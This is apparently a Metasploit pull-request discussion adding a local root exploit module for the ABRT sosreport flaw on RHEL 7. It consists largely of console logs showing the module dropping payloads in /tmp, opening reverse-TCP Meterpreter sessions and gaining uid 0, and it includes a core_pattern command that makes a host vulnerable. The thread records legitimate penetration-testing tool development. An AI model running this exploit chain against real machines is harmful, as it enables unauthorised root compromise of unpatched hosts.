Add ABRT sosreport Privilege Escalation module

[bcoles]

Lazy wrapper for rebel's sosreport-rhel7.py exploit.

Red Hat Enterprise Linux 7.0 (x64)

msf5 > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-12.el7 is vulnerable
[+] python is installed
[*] Writing '/tmp/.DcxBT2w' (2756 bytes) ...
[*] Writing '/tmp/.HUAWYz' (207 bytes) ...
[*] Launching exploit - This might take a few minutes (Timeout: 600s) ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.151
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.151:50843) at 2019-04-20 07:21:24 -0400
[+] Deleted /tmp/.DcxBT2w
[+] Deleted /tmp/.HUAWYz
[+] Deleted /tmp/hax.sh
[*] waiting for sosreport to finish (can take several minutes)....................

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-123.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

Red Hat Enterprise Linux 7.1 (x64)

msf5 > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-19.el7 is vulnerable
[+] python is installed
[*] Writing '/tmp/.gFrwiGr' (2756 bytes) ...
[*] Writing '/tmp/.NA4fwK' (207 bytes) ...
[*] Launching exploit - This might take a few minutes (Timeout: 600s) ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.218
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.218:51022) at 2019-04-20 07:23:24 -0400
[*] waiting for sosreport to finish (can take several minutes)..............

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-229.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

[wchen-r7]

I'm looking for Redhat 7.1 but it seems their website only provides 7.2 at the minimum... could you please find me a link for 7.1?

[bcoles]

I'm looking for Redhat 7.1 but it seems their website only provides 7.2 at the minimum... could you please find me a link for 7.1?

You'll need to sign up as a Red Hat developer, auth to SSO, and then navigate to the correct portal. This can be achieved in 47 simple steps.

No rush. I'll need to address the above issue before this lands.

[wchen-r7]

47 steps!? Wow it's almost like they don't want you to get it.

[bcoles]

47 steps!? Wow it's almost like they don't want you to get it.

1. Go here: https://access.redhat.com/downloads/content/69/
2. Login
3. Select 7.1 from the drop down
4. Select RHEL 7.1 Binary DVD

Edit: [not shown above: the 43 steps required to register and find that link]

[wchen-r7]

Thank you.

[bwatters-r7]

FWIW, the changes work as expected, though this is not vulnerable:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.168:4567 
[*] Sending stage (3021284 bytes) to 192.168.134.103
[*] Meterpreter session 1 opened (192.168.135.168:4567 -> 192.168.134.103:57530) at 2019-06-03 16:26:14 -0500

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[*] ABRT package version 2.1.11-52.el7.centos is not vulnerable
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable. Set ForceExploit to override.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > 

I'm downloading a CentOS 7.0 iso right now and will try that tomorrow if this is still up.

[bcoles]

I'm downloading a CentOS 7.0 iso right now and will try that tomorrow if this is still up.

You'll need RHEL, not CentOS.

[h00die]

Is ABRT the default? I have a 7.1 server x64 VM, and at least on it I got "System is not configured to use ABRT for crash reporting"
Re-installing my 7.0 server to check it

[bcoles]

Is ABRT the default? I have a 7.1 server x64 VM, and at least on it I got "System is not configured to use ABRT for crash reporting"
Re-installing my 7.0 server to check it

I believe so. That seems like the kind of thing I would have documented if it weren't default.

Both my RHEL 7.0 and RHEL 7.1 had ABRT configured as the crash handler.

I checked the shell history on both test boxes and found no indication that I'd changed the core pattern.

The advisory also indicates that it is the default crash handler:

A can be used to elevate privileges from an unprivileged user to root
on a default installation of RHEL 7/7.1. RHEL 6 and lower do not seem
vulnerable by default.

Changing the core_pattern is easy if you want to check the vulnerability:

echo "|/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e" > /proc/sys/kernel/core_pattern

But my guess is that your RHEL 7.1 system is likely not vulnerable, as 7.1 was released on 2015-03-05 and the bug was dropped about 6 months later on 2015-11-23. If you're installed updates any time in the last 4 years it will be patched.

[space-r7]

Successfully tested against RHEL 7.1:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (985320 bytes) to 192.168.37.163
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.163:58254) at 2019-09-24 09:23:15 -0500

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-229.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > check

[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-19.el7 is vulnerable
[+] python is installed
[*] The target appears to be vulnerable.
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-19.el7 is vulnerable
[+] python is installed
[*] Writing '/tmp/.Zw6rGJ2' (2756 bytes) ...
[*] Writing '/tmp/.38QS1nWv' (207 bytes) ...
[*] Launching exploit - This might take a few minutes (Timeout: 600s) ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 192.168.37.163
[*] waiting for sosreport to finish (can take several minutes)......................................................................
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.163:58255) at 2019-09-24 09:25:52 -0500
[+] Deleted /tmp/.38QS1nWv
[+] Deleted /tmp/hax.sh

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-229.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

[space-r7]

Release Notes

This adds a module that attempts to gain root privileges through a symlink attack by exploiting the Automatic Bug Reporting Tool (ABRT) before v2.7.1.